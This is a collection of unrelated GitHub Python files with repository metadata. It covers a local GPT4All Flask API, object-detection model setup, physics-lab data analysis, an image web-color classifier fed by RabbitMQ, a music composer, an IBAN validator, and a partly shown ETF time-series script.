+{"seq_id":"72230170962","text":"# This is a sample Python script.\nimport json\n\nfrom langchain import PromptTemplate, LLMChain\nfrom langchain.llms import GPT4All\nfrom langchain.callbacks.streaming_stdout import StreamingStdOutCallbackHandler\n\nimport offset as of\n# Press Shift+F10 to execute it or replace it with your code.\n# Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings.\n\n\ndef evaluate(question):\n # Use a breakpoint in the code line below to debug your script.\n template = \"\"\"Question: {question}\n\nAnswer: Rewrite the input in a happy tone. \"\"\"\n\n prompt = PromptTemplate(template=template, input_variables=[\"question\"])\n\n local_path = (\n # \"D:\\workspace\\gpt4\\gptall\\ggml-gpt4all-l13b-snoozy.bin\" # replace with your desired local file path\n \"D:\\workspace\\gpt4\\gptall\\ggml-gpt4all-j.bin\"\n )\n\n # Callbacks support token-wise streaming\n callbacks = [StreamingStdOutCallbackHandler()]\n # Verbose is required to pass to the callback manager\n llm = GPT4All(model=local_path, callbacks=callbacks, verbose=True)\n # If you want to use a custom model add the backend parameter\n # Check https://docs.gpt4all.io/gpt4all_python.html for supported backends\n llm = GPT4All(model=local_path, backend=\"gptj\", callbacks=callbacks, verbose=True)\n\n llm_chain = LLMChain(prompt=prompt, llm=llm)\n\n\n\n return llm_chain.run(question)\n\nfrom flask import Flask, request, jsonify\n\napp = Flask(__name__)\n\n@app.route('/chat',methods=[\"POST\"])\ndef hello_flask():\n try:\n question = request.values.get('input')\n #body = request.json.get(\"content\").strip()\n #print(body)\n if not question:\n raise ValueError('Missing parameter')\n results = evaluate(question)\n offset_result = of.calc_offset(question,results)\n my_dict = {}\n my_dict['input'] = question\n my_dict['result'] = results\n my_dict['offset'] = offset_result\n return json.dumps(my_dict, ensure_ascii=False)\n except ValueError as e:\n # 处理异常情况\n error = {'error': str(e)}\n return jsonify(error), 400\n except Exception as e:\n # 记录异常信息\n app.logger.error(f'Unexpected error: {str(e)}')\n error = {'error': 'Internal server error'}\n return jsonify(error), 500\n\n\nif __name__ == '__main__':\n app.run(host=\"0.0.0.0\", port=8989, debug=False)\n","repo_name":"ZhangTai123/gpt4all-api-exploit-for-window10","sub_path":"inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":2395,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"25639501536","text":"from torchvision.models.detection import fasterrcnn_resnet50_fpn, FasterRCNN_ResNet50_FPN_Weights\nfrom torchvision.models.detection.faster_rcnn import FastRCNNPredictor\nfrom torch import nn\nfrom torchvision.models.detection.transform import GeneralizedRCNNTransform\nimport torchvision.models.detection.transform as T\n\ndef get_model_object_detection(num_classes = 2):\n \n model = fasterrcnn_resnet50_fpn(weights= FasterRCNN_ResNet50_FPN_Weights.DEFAULT)\n in_features = model.roi_heads.box_predictor.cls_score.in_features\n model.roi_heads.box_predictor = FastRCNNPredictor(in_features, num_classes)\n\n return model\n\ndef get_temp_model(num_classes = 2):\n \n model = fasterrcnn_resnet50_fpn(weights= FasterRCNN_ResNet50_FPN_Weights.DEFAULT)\n in_features = model.roi_heads.box_predictor.cls_score.in_features\n model.roi_heads.box_predictor = FastRCNNPredictor(in_features, num_classes)\n \n ## change first convolution to take 3*3 channels as inputs --> 9\n model.backbone.body.conv1 = nn.Conv2d(9, 64, kernel_size=(7, 7), stride=(2, 2), padding=(3, 3), bias=False)\n \n image_mean = [0.485, 0.456, 0.406, 0.485, 0.456, 0.406, 0.485, 0.456, 0.406]\n image_std = [0.229, 0.224, 0.225, 0.229, 0.224, 0.225, 0.229, 0.224, 0.225]\n T=GeneralizedRCNNTransform(800, 1333, image_mean, image_std)\n model.transform = T\n\n ## check trainabe parameters\n #params = [p for p in model.parameters() if p.requires_grad]\n\n return model\n ","repo_name":"aureliedj/bird_detection","sub_path":"utils/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"39710638677","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Sep 14 15:21:35 2017\n\n@author: Sebastian\n\"\"\"\n\nimport Praktikum as p\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nef = 5\n\nwiderstand = \"10\"\ndata = p.lese_lab_datei(\"{0:s}Ohm.lab\".format(widerstand))\n\nU = data[:,2]\nI = data[:,3]\n\nphi = data[:,4]\n\nUL = data[:,5]\n\nUC = data[:,6]\n\nf = data[:,8]\n\n\n\n### Breite Strom\n\ndef strombreite(f, I):\n i = np.argmax(I)\n f0 = f[i]\n Imax = np.max(I)\n \n f1 = f[np.argmax(-np.abs(I[0:i]-Imax/np.sqrt(2)))]\n \n f2 = f[np.argmax(-np.abs(I[i:-1]-Imax/np.sqrt(2)))+i]\n \n return Imax, f0, f1, f2\n\nImax, f0, f1, f2 = strombreite(f, I)\n\nplt.figure(1)\nplt.plot(f, -np.abs(I-Imax/np.sqrt(2)))\nplt.plot(f, I)\nplt.axvline(f0)\nplt.axvline(f1)\nplt.axvline(f2)\n\nprint (f0)\nprint(f1)\nprint(f2)\n\nQ1 = f0/(f2-f1)\neQ1 = Q1* np.sqrt( (ef/f0)**2 + (np.sqrt(2)*ef/(f2-f1))**2 )\n\n_, f01, f11, f21 = strombreite(f, I+0.005*0.7)\n_, f02, f12, f22 = strombreite(f, I-0.005*0.7)\n\nQ11 = f01/(f21-f11)\nQ12 = f02/(f22-f12)\n\n\n### Breite Phasenverschiebung\n\ndef phasenbreite(f, phi):\n i = np.argmax(-np.abs(phi))\n f0 = f[i]\n \n f1 = f[ np.argmax( -np.abs(phi-45) ) ]\n f2 = f[ np.argmax( -np.abs(phi+45) ) ]\n return f0, f1, f2, i\n\nf0, f1, f2, i = phasenbreite(f, phi)\n\nplt.figure(2)\nplt.plot(f, phi)\nplt.plot(f, np.concatenate((-np.abs(phi[:i]-45), -np.abs(phi[i:]+45))))\nplt.axvline(f0)\nplt.axvline(f1)\nplt.axvline(f2)\n\nprint(f0)\nprint(f1)\nprint(f2)\n\nQ2 = f0/(f2-f1)\neQ2 = Q2* np.sqrt( (ef/f0)**2 + (np.sqrt(2)*ef/(f2-f1))**2 )\n\n\n\n### Spannungsüberhöhung\n\ndef spannung(f, UL, UC):\n i = np.argmax(-abs(UL-UC))\n U_max = ((UL+UC)/2)[i]\n f0 = f[i]\n \n return U_max, f0\n\nU_max, f0 = spannung(f, UL, UC)\n\nU0 = np.mean(U)\n\neU0 = np.std(U, ddof=1) *3\neU_max = eU0\n\nplt.figure(3)\nplt.plot(f, UL)\nplt.plot(f, UC)\nplt.axhline(U_max)\nplt.axvline(f0)\n\nQ3 = U_max/U0\neQ3 = Q3 * np.sqrt( (eU_max/U_max)**2 + (eU0/U0)**2 )\n\n\nU_max, _ = spannung(f, UL+0.01*UL+0.005*7, UC+0.01*UC+0.005*7)\nQ31 = U_max/(U0)#+0.01*U0+0.005*7)\n\nU_max, _ = spannung(f, UL-0.01*UL-0.005*7, UC-0.01*UC-0.005*7)\nQ32 = U_max/(U0)#-0.01*U0-0.005*7)\n\n\n\nplt.figure(4)\nplt.errorbar(f, I, fmt=\".\")\nplt.title(\"{0:s} Ohm Widerstand - Gesamtstrom\".format(widerstand))\nplt.xlabel(\"f / Hz\")\nplt.ylabel(\"I / A\")\n\n\nplt.figure(5)\nplt.errorbar(f, UL, fmt=\".\")\nplt.errorbar(f, UC, fmt=\".\")\nplt.title(\"{0:s} Ohm Widerstand - Spannung L und C\".format(widerstand))\nplt.xlabel(\"f / Hz\")\nplt.ylabel(\"U / V\")\nplt.figtext(0.22, 0.67, \"$U_C$\")\nplt.figtext(0.35, 0.28, \"$U_L$\")\n\n\nplt.figure(6)\nplt.errorbar(f, phi, fmt=\".\")\nplt.title(\"{0:s} Ohm Widerstand - Phase\".format(widerstand))\nplt.xlabel(\"f / Hz\")\nplt.ylabel(\"$\\phi$ / Grad\")\n","repo_name":"thewhitecat/grundpraktikum1","sub_path":"grundpraktikum2/E-Lehre/Gruppe A/untitled0.py","file_name":"untitled0.py","file_ext":"py","file_size_in_byte":2675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"23197290894","text":"import StringIO\nimport os\n\nclass QOpen(StringIO.StringIO):\n def __init__(self, *args):\n self.__args = args\n StringIO.StringIO.__init__(self)\n\n def close(self):\n import StringIO, os\n fname = self.__args[0]\n if not os.access(fname, os.R_OK) or self.getvalue() != open(fname).read():\n open(*self.__args).write(self.getvalue())\n StringIO.StringIO.close(self)\n\n def __del__(self):\n if not self.closed:\n self.close()\n","repo_name":"fursund/EmguCV-Unity","sub_path":"opencv/doc/latex2sphinx/qfile.py","file_name":"qfile.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"3"}
+{"seq_id":"939351264","text":"import os\n\nfrom PIL import Image\n\nfrom buttons.button import ButtonBase\nfrom gadgets.aten import Aten\nfrom store import store\n\n\nclass AtenSwitchButton(ButtonBase):\n\n def __init__(self, aten: Aten):\n super().__init__()\n self.aten = aten\n aten.switch(1)\n self.selected = 4\n self.image = self.icon()\n\n def icon(self):\n i = Image.open(os.path.abspath(f\"./assets/icons/4or5_{self.selected}.png\"))\n return i\n\n def on_press(self):\n if self.selected == 4:\n self.aten.switch(2)\n self.selected = 5\n store.aten_cam.value = 5\n else:\n self.aten.switch(1)\n self.selected = 4\n store.aten_cam.value = 4\n self.image = self.icon()\n","repo_name":"renagaev/streaming-scripts","sub_path":"buttons/AtenSwitchButton.py","file_name":"AtenSwitchButton.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"}
+{"seq_id":"2922204139","text":"import numpy as np\nimport os\nimport sys\nimport cv2\n\n\nclass ImageWebColor:\n \"\"\"Selection of webcolor for image\"\"\"\n\n def __init__(self, path, image_name, bits_per_color_channel=8):\n \"\"\"Initialize image name and bits per color channel, read image\n\n Note: possibility to change color depth\"\"\"\n self.web_colors_definition = [(\"White\", [100, 100, 100]), (\"Silver\", [75, 75, 75]),\n (\"Gray\", [50, 50, 50]), (\"Black\", [0, 0, 0]),\n (\"Red\", [100, 0, 0]), (\"Maroon\", [50, 0, 0]),\n (\"Yellow\", [100, 100, 0]), (\"Olive\", [50, 50, 0]),\n (\"Lime\", [0, 100, 0]), (\"Green\", [0, 50, 0]),\n (\"Aqua\", [0, 100, 100]), (\"Teal\", [0, 50, 50]),\n (\"Blue\", [0, 0, 100]), (\"Navy\", [0, 0, 50]),\n (\"Fuchsia\", [100, 0, 100]), (\"Purple\", [50, 0, 50])]\n self.image_name = image_name\n self.image = cv2.imread(os.path.join(path, self.image_name), -1)\n self.bits_per_color_channel = bits_per_color_channel\n self.mean_color = None\n\n def compute_image_color_mean(self):\n \"\"\"Parameters:\n returns - compute mean color\n\n Overall description: Compute the arithmetic mean of the image\"\"\"\n\n # check image dimensions, for grayscale images all RGB channels will be same\n if self.image.ndim < 3:\n img_mean_blue_channel = img_mean_green_channel = img_mean_red_channel = np.mean(self.image[:, :])\n else:\n img_mean_blue_channel = np.mean(self.image[:, :, 0]) # get color mean - channel Blue\n img_mean_green_channel = np.mean(self.image[:, :, 1]) # get color mean - channel Green\n img_mean_red_channel = np.mean(self.image[:, :, 2]) # get color mean - channel Red\n\n # color channels in percent according to color depth\n img_mean_color = [(img_mean_red_channel / ((2 ** self.bits_per_color_channel) - 1)) * 100,\n (img_mean_green_channel / ((2 ** self.bits_per_color_channel) - 1)) * 100,\n (img_mean_blue_channel / ((2 ** self.bits_per_color_channel) - 1)) * 100]\n self.mean_color = img_mean_color\n return img_mean_color\n\n def select_webcolor_for_image(self):\n \"\"\"Parameters:\n img_mean_color - average color value ||\n web_colors_definition - define web colors for selection ||\n returns - selected web color for image\n\n Overall description: Select webcolor for the image\n \"\"\"\n if not self.mean_color:\n self.compute_image_color_mean()\n web_colors_definition_values = []\n\n # get values form tuple\n for values in self.web_colors_definition:\n web_colors_definition_values.append(values[1])\n web_colors = np.array(web_colors_definition_values)\n img_mean_color_np = np.array(self.mean_color)\n distances = np.sqrt(np.sum((web_colors - img_mean_color_np) ** 2, axis=1))\n smallest_distance_index = np.where(distances == np.amin(distances))\n smallest_distance_index = smallest_distance_index[0]\n smallest_distance = web_colors[smallest_distance_index]\n print(self.image_name, self.web_colors_definition[int(smallest_distance_index[0])][0], smallest_distance,\n img_mean_color_np)\n\n # return closest webcolor\n return self.web_colors_definition[int(smallest_distance_index[0])][0]\n\n\ndef check_path_and_img_input(path, image_name):\n \"\"\"Check if image is valid\"\"\"\n try:\n os.listdir(path)\n except OSError as error:\n print(error)\n raise\n\n img_path = os.path.join(path, image_name)\n image = cv2.imread(img_path, -1)\n if image is None:\n sys.exit(\"[Error]: Input is an invalid image or path is not correct\")\n\n\ndef get_image_web_color():\n \"\"\"Establish connection, receive message: path and image name, call validation function,\n create 
instance and call methods, send message: webcolor, path and image name\"\"\"\n\n\n import pika\n queue_name = \"m1_get_files_to_m2_compute\"\n\n # establishing connection\n connection = pika.BlockingConnection(pika.ConnectionParameters(host='host.docker.internal'))\n channel = connection.channel()\n\n # creating queue\n channel.queue_declare(queue=queue_name)\n\n # Receiving messages from the queue - subscribing a callback function to a queue\n def callback(ch, method, properties, body):\n # Receiving message\n received_path_image_name = body.decode('utf8')\n print(\" [x] Received:\", received_path_image_name, \" => running module2\")\n path_image_name = received_path_image_name.split(\";\")\n path_image_name_relative = path_image_name[0]\n path_image_name[0] = \"docker-shared/\" + path_image_name[0]\n\n # validate inputs, compute webcolor for the image\n check_path_and_img_input(path_image_name[0], path_image_name[1])\n image_24bit = ImageWebColor(path_image_name[0], path_image_name[1])\n selected_webcolor = image_24bit.select_webcolor_for_image()\n print(\"=> Selected webcolor: \", selected_webcolor, \" for image: \", path_image_name[1])\n\n # create message\n queue_m2_to_m3 = \"m2_compute_to_m3_save_images\"\n channel.queue_declare(queue=queue_m2_to_m3)\n webcolor_path_image_name = [selected_webcolor, path_image_name_relative, path_image_name[1]]\n webcolor_path_image_name = ';'.join([str(elem) for elem in webcolor_path_image_name])\n message_webcolor_path_image_name = bytes(webcolor_path_image_name, 'utf8')\n\n # send message\n channel.basic_publish(exchange='', routing_key=queue_m2_to_m3, body=message_webcolor_path_image_name)\n print(\" [x] Sent message with webcolor, path, image name:\", message_webcolor_path_image_name.decode('utf8'))\n print(\"=> Module 2 finished...\")\n print(' [*] Waiting for messages. To exit press CTRL+C')\n\n # Callback function will receive messages from specified queue\n channel.basic_consume(queue=queue_name, on_message_callback=callback, auto_ack=True)\n\n # Waits for data and runs callbacks whenever necessary\n print(' [*] Waiting for messages. To exit press CTRL+C')\n channel.start_consuming()\n\n\nif __name__ == '__main__':\n try:\n get_image_web_color()\n except KeyboardInterrupt:\n print('Interrupted')\n try:\n sys.exit(0)\n except SystemExit:\n os._exit(0)\n\n","repo_name":"Netopil/Home_Work_BE_Senior","sub_path":"m2_compute/m2_compute.py","file_name":"m2_compute.py","file_ext":"py","file_size_in_byte":6578,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
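Stripped of the image handling and messaging, the color matching in m2_compute.py is a nearest-neighbour lookup: the image's mean RGB (expressed in percent) is compared against the 16 web colors by Euclidean distance. The core computation in isolation, with a shortened color table for brevity:

import numpy as np

web_colors = {"White": [100, 100, 100], "Black": [0, 0, 0],
              "Red": [100, 0, 0], "Green": [0, 50, 0], "Blue": [0, 0, 100]}

def nearest_web_color(mean_rgb_percent):
    names = list(web_colors)
    table = np.array([web_colors[n] for n in names], dtype=float)
    # Euclidean distance from the image mean to every table entry
    dist = np.sqrt(((table - np.asarray(mean_rgb_percent, dtype=float)) ** 2).sum(axis=1))
    return names[int(dist.argmin())]

print(nearest_web_color([90, 10, 5]))  # -> 'Red'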
+{"seq_id":"35444618791","text":"import threading\nfrom random import choice, randint, random\n\nfrom roqba.composers.abstract_composer import AbstractComposer\nfrom roqba.static.scales_and_harmonies import STRICT_HARMONIES, FOUR_NOTE_HARMONIES\nfrom roqba.static.meters import METERS\nfrom roqba.composers.rhythm_and_meter_mixin import RhythmAndMeterMixin\n\nfrom roqba.utilities.sine_controllers import MultiSine\nfrom roqba.utilities import pd_wavetables, wavetable_peaks\n\n\nclass Composer(RhythmAndMeterMixin, AbstractComposer):\n def __init__(self, gateway, settings, behaviour, scale=\"HARMONIC\"):\n super(Composer, self).__init__(gateway,\n settings,\n behaviour)\n self.harm = {}\n self.speed_lim = behaviour['embellishment_speed_lim']\n self.selected_meters = (\"meters\" in list(self.behaviour.keys()) and\n self.behaviour[\"meters\"] or list(METERS.keys()))\n self.modified_note_in_current_frame = None\n self.generate_real_scale(settings['lowest_note_num'],\n settings['highest_note_num'])\n self.half_beat = self.behaviour['half_beat']\n self.second_beat_half = False\n\n # Rendezvous planning\n self.min_rendezvous_tickoffset = behaviour['min_rendezvous_tickoffset']\n self.max_rendezvous_tickoffset = behaviour['max_rendezvous_tickoffset']\n self.fixed_rendezvous_length = behaviour['fixed_rendezvous_length']\n self.min_rendezvous_length = behaviour['min_rendezvous_length']\n self.max_rendezvous_length = behaviour['max_rendezvous_length']\n self._setup_new_controller_wavetable()\n self.strategy_max_deviation_mapping = {\n 'conservative': 1.0,\n 'lax': 2.0,\n 'outgoing': 3.0,\n 'random': 1000\n }\n # Rendezvous handling\n self.num_rendezvous_between_caesurae = behaviour['num_rendezvous_between_caesurae']\n\n # setup state\n self.rendezvous_counter = 0\n self.ticks_counter = 0\n self.rendezvous_tick = False\n self.send_out_tick = -1\n self.select_next_harmony()\n self.select_next_anchor_tick(sendout_offset=1)\n self.prior_harmony = None\n\n self.set_binaural_diffs(self.behaviour['binaural_diff'])\n for voice in list(self.voices.values()):\n voice.slide = False\n args = [random() * 0.3 for n in range(4)]\n voice.pan_sine = MultiSine(args)\n\n if not settings['enable_adsr']:\n self.gateway.pd.send([\"voice\", voice.id, \"adsr_enable\", 0])\n\n def generate(self, state):\n \"\"\"main generating function, the next polyphonic step is produced here.\"\"\"\n self.ticks_counter += 1\n self.comment = 'normal'\n send_to_notator = False\n current_slide_time = self.rendezvous_offset * state['speed'] * 1000\n if self.rendezvous_tick == self.ticks_counter:\n send_to_notator = True\n self.rendezvous_counter += 1\n if self.rendezvous_counter > self.num_rendezvous_between_caesurae:\n self.rendezvous_counter = 0\n self.comment = 'caesura'\n self.prior_harmony = self.next_harmony\n self.select_next_harmony()\n sendout_offset = (self.fixed_rendezvous_length\n if self.fixed_rendezvous_length is not None\n else randint(self.min_rendezvous_length,\n self.max_rendezvous_length))\n self.select_next_anchor_tick(sendout_offset=sendout_offset)\n if self.send_out_tick == self.ticks_counter and self.behaviour['common_transitions']:\n transitions = self.determine_rendezvous_transition()\n for voice in list(self.voices.values()):\n if len(self.voices) < self.num_voices:\n raise RuntimeError(\"mismatch in voices count\")\n next_note = self.next_voice_note(voice)\n if next_note:\n # send a rendezvous message\n # duration, start_index, end_index, start_note, end_note, start_multiplier\n # and end_multiplier\n if not 
self.behaviour['common_transitions']:\n                    transitions = self.determine_rendezvous_transition(voice)\n                transition = choice(transitions['downwards' if next_note <= voice.note else 'upwards'])\n\n                self.gateway.pd.send([\n                    \"voice\",\n                    voice.id,\n                    \"rendezvous\",\n                    current_slide_time,\n                    transition['start'][0],  # index\n                    transition['end'][0],\n                    voice.note, next_note,\n                    transition['start'][1],  # multiplier\n                    transition['end'][1],\n                ])\n                voice.note = next_note\n            else:\n                voice.note_change = False\n                continue\n        cycle_pos = state['cycle_pos']\n        send_drum = True\n        if self.half_beat:\n            if cycle_pos % 2 == 0:\n                cycle_pos = cycle_pos // 2\n                if self.second_beat_half:\n                    cycle_pos += int(self.meter[0] / 2)\n                self.drummer.generator.send([state, cycle_pos])\n            else:\n                send_drum = False\n        else:\n            self.drummer.generator.send([state, cycle_pos])\n        for k, v in list(self.drummer.frame.items()):\n            # TODO: re-add the drum filler\n            if False and v[\"meta\"]:\n                if v[\"meta\"] == 'empty':\n                    threading.Thread(target=self.drum_fill_handler,\n                                     args=(k, state)).start()\n                if v[\"meta\"] == 'mark':\n                    threading.Thread(target=self.drum_mark_handler,\n                                     args=(k, state)).start()\n        if send_drum:\n            self.gateway.drum_hub.send(self.drummer.frame)\n        for voice in list(self.voices.values()):\n            voice.update_current_microvolume()\n            self.gateway.send_voice_pan(voice, voice.pan_sine.get_value())\n            # self.gateway.send_voice_peak_level(voice, voice.current_microvolume)\n        if self.notate and send_to_notator:\n            self.notator.note_to_file({\"notes\": self.prior_harmony,\n                                       \"weight\": state[\"weight\"],\n                                       \"cycle_pos\": state[\"cycle_pos\"]})\n        return self.comment\n\n    def determine_rendezvous_transition(self, voice=None):\n        if self.behaviour['transition_strategy'] == 'direct':\n            transitions = self._direct_transitions()\n        elif self.behaviour['transition_strategy'] in list(self.strategy_max_deviation_mapping.keys()):\n            # look up the numeric deviation cap for the named strategy before filtering\n            transitions = self._transitions_by_deviation(\n                self.strategy_max_deviation_mapping[self.behaviour['transition_strategy']])\n        else:\n            # wrap the randomly picked transitions in lists so the caller's choice() still works\n            transitions = {\n                'upwards': [choice(self.rendezvous_transitions['upwards'])],\n                'downwards': [choice(self.rendezvous_transitions['downwards'])]\n            }\n        return transitions\n\n    def _setup_new_controller_wavetable(self):\n        self.controller_wavetable_string = pd_wavetables.random_wavetable(partials=randint(3, 10))\n        self.gateway.pd.send([\"sys\", \"controller_wavetable\", self.controller_wavetable_string])\n        self.controller_wavetable = pd_wavetables._apply_wavetable(self.controller_wavetable_string)\n        # the transitions are used for the single voices moving from one peak point to another\n        self.rendezvous_transitions = wavetable_peaks.extract_peak_passages(\n            self.controller_wavetable)\n\n    def select_next_harmony(self):\n        \"\"\"select the next rendezvous's harmony\"\"\"\n        next_harmony_pattern = [0] + list(choice(STRICT_HARMONIES + FOUR_NOTE_HARMONIES))\n        next_offset = randint(24, 48)  # TODO: make something musical\n        self.next_harmony = [note + next_offset + (randint(0, 2) * 12)\n                             for note in next_harmony_pattern]\n\n    def select_next_anchor_tick(self, sendout_offset=0):\n        \"\"\"set the next send-out and rendezvous ticks\"\"\"\n        self.send_out_tick = self.ticks_counter + sendout_offset\n        self.rendezvous_offset = randint(self.min_rendezvous_tickoffset,\n                                         self.max_rendezvous_tickoffset)\n        self.rendezvous_tick = self.send_out_tick + self.rendezvous_offset\n\n    def next_voice_note(self, voice):\n        \"\"\"return the next note for a voice if it is the correct tick\"\"\"\n        if self.send_out_tick == self.ticks_counter:\n            return self.next_harmony[voice.id - 1]\n        return False\n\n    def _transitions_by_deviation(self, max_deviation):\n        return {'upwards': [transition for transition in self.rendezvous_transitions['upwards']\n                            if transition['deviation'] <= max_deviation],\n                'downwards': [transition for transition in self.rendezvous_transitions['downwards']\n                              if transition['deviation'] <= max_deviation]}\n\n    def _direct_transitions(self):\n        return {'upwards': [transition for transition in self.rendezvous_transitions['upwards']\n                            if not transition['in_between']],\n                'downwards': [transition for transition in self.rendezvous_transitions['downwards']\n                              if not transition['in_between']]}\n","repo_name":"kr1/roqba","sub_path":"roqba/composers/rendezvous.py","file_name":"rendezvous.py","file_ext":"py","file_size_in_byte":9503,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"}
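The strategy handling in determine_rendezvous_transition maps a behaviour string to a numeric deviation cap and keeps only the peak-to-peak transitions within that cap. A toy illustration of the filtering step, with made-up transition data:

from random import choice

strategy_max_deviation = {'conservative': 1.0, 'lax': 2.0, 'outgoing': 3.0, 'random': 1000}
transitions = {'upwards': [{'start': (0, 1.0), 'end': (3, 0.8), 'deviation': 0.5},
                           {'start': (1, 0.6), 'end': (5, 1.0), 'deviation': 2.7}],
               'downwards': [{'start': (5, 1.0), 'end': (0, 0.4), 'deviation': 1.2}]}

cap = strategy_max_deviation['lax']  # 2.0
allowed = {d: [t for t in ts if t['deviation'] <= cap] for d, ts in transitions.items()}
print(choice(allowed['upwards']))    # only the 0.5-deviation transition survives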
+{"seq_id":"1053826972","text":"# International Bank Account Numbers (IBAN) validator\n\n# Check one: the total IBAN lenght is correct.\n\n# Move the first four characters to the end of the string,\n# replace each letter with its two-digit number representation\n# A = 10, B = 11, C = 12, ..., Z = 35\n# convert the string to an decimal integer\n\n# Check two: Compute the remainder of the previous number on division by 97;\n# if the remainder is 97, the check is passed.\n\n\niban = input(\"Enter IBAN, please: \")\niban = iban.replace(' ','')\n\nif not iban.isalnum():\n print(\"You have entered invalid characters.\")\nelif len(iban) < 15:\n print(\"IBAN entered is too short.\")\nelif len(iban) > 31:\n print(\"IBAN entered is too long.\")\nelse:\n iban = (iban[4:] + iban[0:4]).upper()\n iban2 = ''\n for ch in iban:\n if ch.isdigit():\n iban2 += ch\n else:\n iban2 += str(10 + ord(ch) - ord('A'))\n iban = int(iban2)\n if iban % 97 == 1:\n print(\"IBAN entered is valid.\")\n else:\n print(\"IBAN entered is invalid.\")\n\n \n\n\n","repo_name":"Miguelp-rez/Python-Essentials","sub_path":"Intermediate/Module2/Section5/iban_validator.py","file_name":"iban_validator.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"14356436419","text":"# coding:utf-8\n# 时间序列分析实操\n\n\nimport tushare as ts\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom statsmodels.graphics.tsaplots import *\nimport statsmodels.api as sm\nimport math\n# from sklearn.metrics import mean_squared_error\n\n\n#将八位数字的日期转换为yyyy-mm-dd\ndef TransfDate(d):\n\tyear = int(d/10000)\n\tmonth = int((d - year*10000)/100)\n\tday = int((d - year*10000 - month*100))\n\tdate = format(\"%4d-%02d-%02d\" % (year, month, day))\n\treturn date\n \n\n# 获取股票数据\ndef GetHistoryData(Code, BeginTime, EndTime):\n\tdf = ts.get_k_data(Code, index = False, start = TransfDate(BeginTime), end = TransfDate(EndTime))\n\treturn df\n\t\n\n# 计算模型预测的误差\n#def pre_error(data, model):\n#\trmse = math.sqrt(mean_squared_error(data, model))\n#\treturn rmse\n\t\n\t\nif __name__ == \"__main__\":\n\t# 读取历史数据,运行一次就行了。\n\t#df_300 = GetHistoryData(\"510300\", 20120531, 20200131)\n#\tdf_300.index = df_300[\"date\"]\n#\tdf_300 = df_300.drop([\"date\"], axis = 1)\n#\tdf_300.to_csv(\"300.csv\")\n#\tdf_nas = GetHistoryData(\"513100\", 20130531, 20200131)\n#\tdf_nas.index = df_nas[\"date\"]\n#\tdf_nas = df_nas.drop([\"date\"], axis = 1)\n#\tdf_nas.to_csv(\"nas.csv\")\n\t# 从保存的csv文件里读取数据\n\tdf_300 = pd.read_csv(\"300.csv\", index_col = \"date\", parse_dates = [\"date\"])\n\tdf_nas = pd.read_csv(\"nas.csv\", index_col = \"date\", parse_dates = [\"date\"])\n\tprint(df_300.head())\n\tprint(df_nas.head())\n\t\n\t# 将数据可视化\n\tfig = plt.figure()\n\tdf_300.plot(subplots = True)\n\tplt.title(\"300ETF\")\n\tplt.savefig(\"300ETF.png\")\n\tdf_nas.plot(subplots = True)\n\tplt.title(\"nasETF\")\n\tplt.savefig(\"nasETF.png\")\n\t\n\t# 重采样 画月线\n\tfig = plt.figure()\n\tdf_300[\"close\"].resample(\"M\").mean().plot(legend = True)\n\tplt.savefig(\"300ETF_month.png\")\n\t\n\t# 改变百分率图形\n\tfig = plt.figure()\n\tplt.subplot(211)\n\tdf_300.close.div(df_300.close.shift(1)).plot(figsize = (20, 8))\n\tplt.title(\"300ETF percent\")\n\tplt.subplot(212)\n\tdf_nas.close.div(df_nas.close.shift(1)).plot(figsize = (20, 8))\n\tplt.title(\"nasETF percent\")\n\tplt.savefig(\"percent.png\")\n\t\n\t# 计算收益率\n\tdf_300[\"returns\"] = df_300.close.pct_change().mul(100)\n\tdf_nas[\"returns\"] = df_nas.close.pct_change().mul(100)\n\tfig = plt.figure()\n\tplt.subplot(211)\n\tdf_300.returns.plot(figsize = (20,6))\n\tplt.subplot(212)\n\tdf_nas.returns.plot(figsize = (20,6))\n\tplt.savefig(\"returns.png\")\n\t\n\t# 相继列的绝对改变\n\tfig = plt.figure()\n\tplt.subplot(211)\n\tdf_300.close.diff().plot(figsize = (20, 6))\n\tplt.subplot(212)\n\tdf_nas.close.diff().plot(figsize = (20, 6))\n\tplt.savefig(\"absdiff.png\")\n\t\n\t# 比较两个序列\n\t# 正态化以前比较\n\tfig = plt.figure()\n\tdf_300.close.plot()\n\tdf_nas.close.plot()\n\tplt.legend([\"300etf\", \"nasetf\"])\n\tplt.savefig(\"compare1.png\")\n\t# 正态化,从同一时间点开始比较\n\tdf_300_cut = df_300.close[\"2013-05-31\":]\n\tnorm_300 = df_300_cut.div(df_300_cut.iloc[0]).mul(100)\n\tnorm_nas = df_nas.close.div(df_nas.close.iloc[0]).mul(100)\n\tfig = plt.figure()\n\tnorm_300.plot()\n\tnorm_nas.plot()\n\tplt.legend([\"300etf\", \"nasetf\"])\n\tplt.savefig(\"compare2.png\")\n\t# 窗口函数,90日均线\n\t# Rolling 相同大小和切片\n\trolling_300 = df_300.close.rolling(\"90D\").mean()\n\trolling_nas = df_nas.close.rolling(\"90D\").mean()\n\tfig = plt.figure()\n\tdf_300.close.plot()\n\trolling_300.plot()\n\tplt.savefig(\"rolling300.png\")\n\tfig = plt.figure()\n\tdf_nas.close.plot()\n\trolling_nas.plot()\n\tplt.savefig(\"rollingNAS.png\")\n\t# Expanding 包含之前所有数据\n\texpanding_300 = df_300.close.expanding().mean()\n\texpanding_nas = 
